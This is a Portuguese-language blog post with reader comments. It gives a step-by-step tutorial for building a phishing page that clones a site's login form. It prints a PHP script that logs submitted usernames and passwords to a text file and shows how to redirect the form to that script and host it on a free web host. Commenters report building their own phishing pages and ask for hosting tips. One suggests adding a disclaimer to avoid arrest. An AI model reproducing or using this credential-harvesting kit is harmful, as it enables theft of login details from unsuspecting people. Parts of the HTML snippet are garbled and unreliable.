Tenho postado sobre phishing e o atacante utilizando técnicas para espalhar seus sites de phishing. Agora, vamos ver como eles criam essas páginas de phishing em primeiro lugar com o passo-a-passo. O Conhecimento de PHP e HTML será muito útil para criar páginas de login falso
1- Selecione um site de destino e navegue até a página de login.
2- Salve a página inteira indo em Arquivo-> Salvar como .. (Estou fazendo isso no Firefox .)
3- Você terá agora um arquivo HTML e uma pasta cheia de imagens e talvez alguns arquivos JavaScript. Renomeie o arquivo HTML para index.html e crie um outro arquivo chamado lista.txt. Este arquivo de texto irá realizar as credenciais de login das vítimas.
4- Crie um arquivo PHP com o nome “phish.php“
5- Cole o seguinte código para o arquivo PHP (phish.php) que você já fez. Este código é o que leva os detalhes de login e os armazena no arquivo “lista.txt“, e depois redireciona para o site real. Desta forma, o usuário vai pensar que ele colocou as informações de login errado e terá êxito, a segunda vez que ele for tentar se logar o site se redirecionara para o site real. Fazendo assim com que a vitima nem perceba que seus dados foram roubados.
<?php
$handle = fopen("lista.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");
fclose($handle);exit;?>6. Agora temos que apontar o formulário de login no arquivo HTML para o arquivo PHP (phish.php). Localize o código do formulário no arquivo HTML e alterar o link de ação para o arquivo PHP e do tipo de método de começar assim que as informações apresentadas são passados através da URL. O código HTML deve começar com algo como isto:
<form action = sitelink ” . com o método = “GET”>
altere para:
<form action = http://www.site.com/phish.php ” . com o método = “GET”>
Ou:
<form action = phish.php ” . com o método = “GET”>
7. Quando tudo estiver concluído, faça o upload dos arquivos para um webhost gratuito que suporte PHP.
8. Você acabou de criar uma página de phishing.
Autor: Diablos 4-Ever
(4 votos, média: 4,25 por 5)
Loading ...
15 de junho de 2010 at 3:33 PM
Como configurar o Wamp server corretamente?
20 de setembro de 2010 at 7:19 PM
Pow cara muito mas muito bom mesmo seus tutoriais.
Apenas não entendi uam parte >> e crie um outro arquivo chamado lista.txt. Este arquivo de texto irá realizar as credenciais de login das vítimas.<<<
Se puder exclarecer agradeço. ^^
8 de dezembro de 2010 at 5:05 PM
vlws cara belo tutorial tó tentando criar minha pagina de phishing aqui ^^
6 de janeiro de 2011 at 6:21 PM
Kra uma dica sempre q vc postar algo coloque algo como “Atenção: este texto é somente para aprendizado proprio não nos responabilizamos por seus atos” isso ajuda se um dia vc for preso…
7 de janeiro de 2011 at 7:30 PM
Eu fiz tudo bem, mas não sei que webhost free devo usar =(, além de você não ter dado nenhuma dica sobre o webhost, se tiver a gentileza de me recomendar um free fazia-me um grande favor vlw
responda se for possivel cara, grande site continue o bom trabalho.
13 de outubro de 2011 at 3:02 PM
ahh deu certo karaka mano isso deu certo mesmo muito obrigado galera se vcs quizerem explicaçao melho mi add no msn andrekrazx01@hotmail.com
28 de outubro de 2011 at 7:30 PM
Man,vlw mas o cara aew @Anti.Peace ja flw tudo,tem que colocar “Nao se responsabilizo pelos esus atos..”
29 de dezembro de 2011 at 11:37 PM
o que e metodo get?
1 de abril de 2012 at 11:55 AM
Não acho esse .com o método GET>
É esse?
Ai fica
???
1 de abril de 2012 at 11:56 AM
Não apareceu o código
8 de dezembro de 2012 at 6:18 PM
Alguem me diz um site que eu possa usar para fazer a host da pagina fake ?